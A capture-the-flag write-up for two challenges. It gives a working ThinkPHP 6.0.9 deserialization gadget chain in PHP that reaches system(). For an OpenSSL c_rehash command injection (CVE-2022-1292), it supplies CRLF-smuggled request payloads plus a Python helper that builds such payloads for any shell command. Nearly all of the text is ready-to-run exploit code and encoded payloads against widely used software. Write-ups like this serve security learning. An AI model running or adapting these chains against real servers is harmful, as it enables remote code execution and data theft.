Ezpop
The ThinkPHP 6.0.9 chain works as-is: Model::__destruct() calls save() because lazySave is set, save() goes through updateData() and checkAllowFields() into db(), which concatenates $this->name . $this->suffix; with suffix set to a second Model that concatenation triggers __toString() -> toJson() -> toArray(), and toArray() reads the visible attribute 'feng' through getValue(), which for a json field with an array withAttr calls $withAttr['feng']['feng']($data['feng']['feng']), i.e. system('cat /flag.txt'). exp:
<?php
// Minimal copies of the traits Model uses: only the property names and
// values matter, since serialize() stores them by name.
namespace think\model\concern;
trait Attribute{
    // getJsonValue(): $withAttr['feng']['feng']($data['feng']['feng'], ...)
    // => system('cat /flag.txt')
    private $data=['feng'=>['feng'=>'cat /flag.txt']];
    private $withAttr=['feng'=>['feng'=>'system']];
    protected $visible = ['123'=>'feng'];   // makes toArray() read attribute 'feng'
    protected $json = ['feng'=>'feng'];     // 'feng' is a json field -> getJsonValue() branch
    protected $jsonAssoc = true;            // json value handled as an array ($value[$key])
}
trait ModelEvent{
    protected $withEvent;
}
namespace think;
abstract class Model{
    use model\concern\Attribute;
    use model\concern\ModelEvent;
    private $exists;
    private $force;
    private $lazySave;
    protected $suffix;
    function __construct($a = '')
    {
        $this->exists = true;     // save() takes the updateData() path
        $this->force = true;
        $this->lazySave = true;   // __destruct() calls save()
        $this->withEvent = false; // skip model events inside save()
        $this->suffix = $a;       // db() does name . suffix -> __toString() on the inner Pivot
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model{
}
// Outer Pivot: __destruct -> save -> ... -> db() -> string concat with suffix (inner Pivot)
// Inner Pivot: __toString -> toJson -> toArray -> withAttr closure -> system()
echo urlencode(serialize(new Pivot(new Pivot())));
?>
Then POST the output to /index.php/index/test as parameter a.
online_crt
CVE-2022-1292. I found the patch on GitHub. In the Go service I saw a rename operation, and in the Python service a c_rehash call. Combining that with the CVE's command injection (c_rehash passes certificate file names to a shell without sanitising them), I set up the environment locally and confirmed that a file name containing backticks gets command execution. So the plan: first generate a new file at /getctr, then use CRLF injection to rename it (the payloads below smuggle a request to the admin backend's /admin/rename through the uri parameter). A / cannot appear in the injected command, though, so cat /flag needs a bypass. Step 1: write the base64 of the command to run into a.crt:
uri=/admin%252frename%3foldname%3dc675e14c-5a79-40b7-9a5a-18427c731ba8.crt%26newname%3d`echo%2520Y2F0IC9mbGFn>a.crt`+HTTP/1.1%0d%0aHost%3a+admin%0d%0aUser-Agent%3a+Guest%0d%0aAccept-Encoding%3a+gzip,+deflate%0d%0aAccept-Language%3a+zh-CN,zh%3bq%3d0.9%0d%0aConnection%3a+close%0d%0a%0d%0a
Then go to /createlink, which runs c_rehash and executes the command embedded in the file name. Step 2: decode and run the command stored in a.crt, writing its output to b.crt:
uri=/admin%252frename%3foldname%3d7df0575e-5720-4c0c-a1d6-b8aa9835953e.crt%26newname%3d`cat%2520a.crt|base64%2520-d|bash>b.crt`+HTTP/1.1%0d%0aHost%3a+admin%0d%0aUser-Agent%3a+Guest%0d%0aAccept-Encoding%3a+gzip,+deflate%0d%0aAccept-Language%3a+zh-CN,zh%3bq%3d0.9%0d%0aConnection%3a+close%0d%0a%0d%0a
Then go to /createlink again to trigger execution; b.crt now contains the flag.
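Putting the two steps together, here is an added Python helper (not from the write-up or the challenge) that builds the uri values above from a plain command. It assumes the two-layer encoding the page's payloads show: the front end decodes the uri form value once (CRLF as %0d%0a, space as +), and the admin backend decodes the smuggled request's query string once more (spaces inside the command as %20, so %2520 on the wire); the double-encoded slash in /admin%252frename, the header block and the a.crt/b.crt names are copied from the page, and the two oldname values are the page's (in practice each comes from /getctr). It also handles a case the page does not hit: standard base64 of a command can itself contain / (and +, which I assume a query-string parser would decode to a space before base64 -d sees it), so the helper prepends a harmless shell no-op to shift the 3-byte alignment until the encoding is clean.

```python
import base64
import re
import urllib.parse

# Header block carried after the injected request line, copied from the
# page's payloads (Host: admin is what routes the smuggled request).
SMUGGLED_HEADERS = [
    "Host: admin",
    "User-Agent: Guest",
    "Accept-Encoding: gzip, deflate",
    "Accept-Language: zh-CN,zh;q=0.9",
    "Connection: close",
]

# Shell prefixes that do nothing but shift base64's 3-byte alignment
# (':' is the shell no-op builtin). Assumption: leading spaces and ':;'
# are harmless in front of the command that c_rehash's shell runs.
NO_OP_PREFIXES = ["", " ", "  ", ":;", ":; ", ":;  "]


def b64_for_filename(command: str) -> str:
    """Standard base64 of `command` containing neither '/' (the page says it
    cannot appear in the injected name) nor '+' (assumption: a query-string
    parser would decode it to a space before `base64 -d` sees it).

    For ASCII input, '/' (index 63) only appears when '?' is the third byte
    of a 3-byte group and '+' (index 62) only when '>' is, so shifting the
    input by one or two bytes moves such a byte out of that slot.
    """
    for prefix in NO_OP_PREFIXES:
        enc = base64.b64encode((prefix + command).encode()).decode()
        if "/" not in enc and "+" not in enc:
            return enc
    raise ValueError("could not realign base64 to avoid '/' and '+'")


def smuggled_rename(oldname: str, command: str) -> str:
    """Value of the `uri` parameter that smuggles
    GET /admin/rename?oldname=<oldname>&newname=`<command>` to the admin
    backend via CRLF injection, encoded the way the page's payloads are.
    """
    if "/" in command:
        raise ValueError("'/' is not allowed in the injected file name")
    # Inner layer: what the backend's query parser decodes. Spaces must be
    # %20 here or they would terminate the smuggled request line.
    inner_cmd = command.replace("%", "%25").replace(" ", "%20")
    request_line = f"/admin%2frename?oldname={oldname}&newname=`{inner_cmd}` HTTP/1.1"
    inner = "\r\n".join([request_line, *SMUGGLED_HEADERS]) + "\r\n\r\n"
    # Outer layer: form-encode once for the front end. Characters the page
    # leaves raw (/ ` > | . , -) stay raw; CRLF becomes %0d%0a, space '+'.
    outer = urllib.parse.quote_plus(inner, safe="/`>|.,-")
    # quote_plus emits upper-case hex; the page's payloads use lower case.
    return re.sub(r"%[0-9A-F]{2}", lambda m: m.group(0).lower(), outer)


def rename_chain(command: str, oldname1: str, oldname2: str) -> tuple:
    """The two `uri` values of the two-step trick: step 1 drops the base64 of
    `command` into a.crt, step 2 decodes and runs it, capturing output in
    b.crt. Each step is followed by a request to /createlink so c_rehash
    processes the backtick-quoted file name.
    """
    step1 = smuggled_rename(oldname1, f"echo {b64_for_filename(command)}>a.crt")
    step2 = smuggled_rename(oldname2, "cat a.crt|base64 -d|bash>b.crt")
    return step1, step2


if __name__ == "__main__":
    # oldname values are the ones from the page; in practice each comes from /getctr.
    for step in rename_chain("cat /flag",
                             "c675e14c-5a79-40b7-9a5a-18427c731ba8.crt",
                             "7df0575e-5720-4c0c-a1d6-b8aa9835953e.crt"):
        print("uri=" + step)
```

Running it with cat /flag reproduces the two uri= bodies above byte for byte; a command such as cat /fla? (whose plain base64 ends in /) gets a leading space prepended so the encoding stays free of / and +.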